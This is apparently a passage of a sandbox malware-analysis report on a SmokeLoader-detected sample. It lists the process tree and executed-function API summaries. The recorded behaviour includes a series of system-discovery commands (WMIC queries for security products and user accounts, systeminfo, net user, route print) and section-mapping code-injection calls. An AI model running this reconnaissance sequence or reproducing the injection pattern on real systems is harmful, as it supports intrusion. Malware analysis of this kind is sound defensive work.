Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	20:53:36
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	20:53:37
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xd50000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	20:53:39
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	20:53:39
Start date:	02/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	20:53:40
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	20:53:42
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	20:53:44
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	20:53:46
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	20:53:49
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	20:53:51
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	20:53:56
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	20:53:58
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	20:54:00
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	20:54:04
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	20:54:07
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	20:54:09
Start date:	02/10/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /displaydns
Imagebase:	0x7ff6e2a50000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	20:54:10
Start date:	02/10/2024
Path:	C:\Windows\System32\ROUTE.EXE
Wow64 process (32bit):	false
Commandline:	route print
Imagebase:	0x7ff634940000
File size:	24'576 bytes
MD5 hash:	3C97E63423E527BA8381E81CBA00B8CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	20:54:11
Start date:	02/10/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh firewall show state
Imagebase:	0x7ff781b50000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	20:54:12
Start date:	02/10/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff6fee80000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	20:54:15
Start date:	02/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /v /fo csv
Imagebase:	0x7ff628af0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	20:54:40
Start date:	02/10/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net accounts /domain
Imagebase:	0x7ff6de720000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	20:54:40
Start date:	02/10/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 accounts /domain
Imagebase:	0x7ff6553c0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	20:54:41
Start date:	02/10/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net share
Imagebase:	0x7ff6de720000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	20:54:42
Start date:	02/10/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 share
Imagebase:	0x7ff6553c0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	20:54:44
Start date:	02/10/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net user
Imagebase:	0x7ff6de720000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	18.4%
Signature Coverage:	28.7%
Total number of Nodes:	261
Total number of Limit Nodes:	8

Executed Functions

Function 00419FC0 Relevance: 52.8, APIs: 28, Strings: 2, Instructions: 289
filewindowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 0041A00F
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041A0A3
GetFocus.USER32 ref: 0041A0A9
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041A0B4
FindAtomW.KERNEL32(00000000), ref: 0041A0BB
SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041A0C3
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0041A0EA
CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 0041A0F3
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 0041A109
GetEnvironmentStrings.KERNEL32 ref: 0041A10F
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041A154
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041A163
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 0041A16C
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041A181
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041A192
SetCommState.KERNELBASE(00000000,00000000), ref: 0041A1B9
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 0041A1EA
GetComputerNameA.KERNEL32(?,?), ref: 0041A1FE
CopyFileW.KERNEL32(0041C3E4,0041C3B8,00000000), ref: 0041A20F
GetFileAttributesA.KERNEL32(00000000), ref: 0041A216
GetConsoleAliasExesLengthA.KERNEL32 ref: 0041A21C
GetBinaryType.KERNEL32(0041C400,?), ref: 0041A22E
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041A241
GetLongPathNameA.KERNEL32(0041C418,?,00000000), ref: 0041A254
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 0041A25C
LoadLibraryA.KERNELBASE(0041C424), ref: 0041A2E2

Strings

k`, xrefs: 0041A31D
}$, xrefs: 0041A345

Memory Dump Source

Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd

Similarity

API ID: Console$File$CommName$CopyLengthObject$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCreateDefaultEnvironmentExchangeExesFindFocusFormatInformationInterlockedLibraryLoadLongMessageModeModuleOutputPathPipePrivilegeReadSingleStateStringsSystemTimeTimeoutsTypeVolumeWaitWrite
String ID: k`$}$
API String ID: 4249349521-956986773
Opcode ID: 5492706f10444c87f4e6cd1a549380370fe9cf3beb514ac8ad46032188454c02
Instruction ID: 4f0dc8ef0138a425de16278279ab74f02fd967f86d49b53b2b7e7158032d42a8
Opcode Fuzzy Hash: 5492706f10444c87f4e6cd1a549380370fe9cf3beb514ac8ad46032188454c02
Instruction Fuzzy Hash: ABA19F71802524ABD725EB61DC48FDF7B78EF49311F00816AF619A2161DB381A85CFEE

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 009117D6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009117FE
Module32First.KERNEL32(00000000,00000224), ref: 0091181E

Memory Dump Source

Source File: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0090E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90e000_v173TV3V11.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: af866eab8ed17e9b7a48362f477ead9566050c0074fda3856c31d2826a3d5226
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: AEF0C2322003197FE7203BF5A88CBAB76ECAF49724F204568E743910C0DBB0E8858A60

Function 006B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D

Strings

cess, xrefs: 006B018D
kernel32.dll, xrefs: 006B008F, 006B0095

Memory Dump Source

Source File: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_v173TV3V11.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14

Function 00419CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00515FF0), ref: 00419D9F
GetProcAddress.KERNEL32(00000000,00420518), ref: 00419DDC
VirtualProtect.KERNELBASE(00515E34,00515FEC,00000040,?), ref: 00419DFB

Strings

, xrefs: 00419D05

Memory Dump Source

Source File: 00000000.00000002.1780259821.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_v173TV3V11.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
Instruction ID: 9b101dc19ab9e509907a73f40bd9e615ad2773d8f65bdac5e4741cefec9585ad
Opcode Fuzzy Hash: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
Instruction Fuzzy Hash: 273164516187C4EAE311CB64FC087523AA2AF79704F448069A148877B3E7BE065ADB6E

Function 006B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E

Memory Dump Source

Source File: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_v173TV3V11.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1780201603.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_v173TV3V11.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
